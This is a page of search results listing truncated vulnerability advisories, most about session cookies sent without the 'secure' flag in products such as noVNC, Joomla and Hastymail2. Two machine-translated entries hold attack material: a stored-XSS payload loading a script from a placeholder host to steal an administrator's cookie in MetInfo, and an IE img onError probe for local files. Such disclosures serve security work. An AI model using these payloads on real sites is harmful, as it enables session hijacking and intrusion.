73 matches found
novnc: session hijack through insecurely set session token cookies
It was discovered that noVNC did not properly set the 'secure' flag when issuing cookies. An attacker could use this flaw to intercept cookies via a man-in-the-middle attack...
Session fixation
IBM Jazz Team Server, as used in Rational Collaborative Lifecycle Management; Rational Quality Manager 3.x before 3.0.1.6 iFix 3, 4.x before 4.0.7, and 5.x before 5.0.1; and other Rational products, does not set the secure flag for the session cookie in an https session, which makes it easier for...
CVE-2014-3853
Pyplate 0.08 does not set the secure flag for the id cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
Session fixation
The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 through 1.5.0.1 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
Mastery OA contents of the log stored XSS can get the cookie-vulnerability warning-the black bar safety net
Mastery OA2013 and 2 0 1 0 version, Office Anywhere 2 0 1 3 work log edit page there is the storage typeXSS, and their superiors view the log after you can steal the cookie 1, the work log edit page source code to bypass the bypass a character can be constructedXSS! ! ! 1, the interception to giv...
CVE-2011-4728
The Server Administration Panel in Parallels Plesk Panel 10.2.0build1011110331.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies us...
The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net
Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...
CVE-2009-5051
Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
Session fixation
Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
DEBIAN-CVE-2009-3584
SQL-Ledger 2.8.24 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
PT-2008-5423 · Open Source Matters · Joomla!
Name of the Vulnerable Software and Affected Versions: Joomla! version 1.5.8 Description: The issue makes it easier for remote attackers to capture the session cookie by intercepting its transmission within an http session, as the secure flag is not set for the session cookie in an https session...
Design/Logic Flaw
Octeth Oempro 3.5.5.1, and possibly other versions before 4, does not set the secure flag for the PHPSESSID cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
An IE browser vulnerability security testing and analysis-vulnerability warning-the black bar safety net
Today saw on the Internet A IE little vulnerability. Do the following simple analysis The use method is as follows Program code: img src="sysimage://C:\WINNT\Notepad.exe,7 7 7" onError="document. write’bFile Exists!& lt;/b’;" Just start very strange this sysimage://is a Protocol,so in IE into:...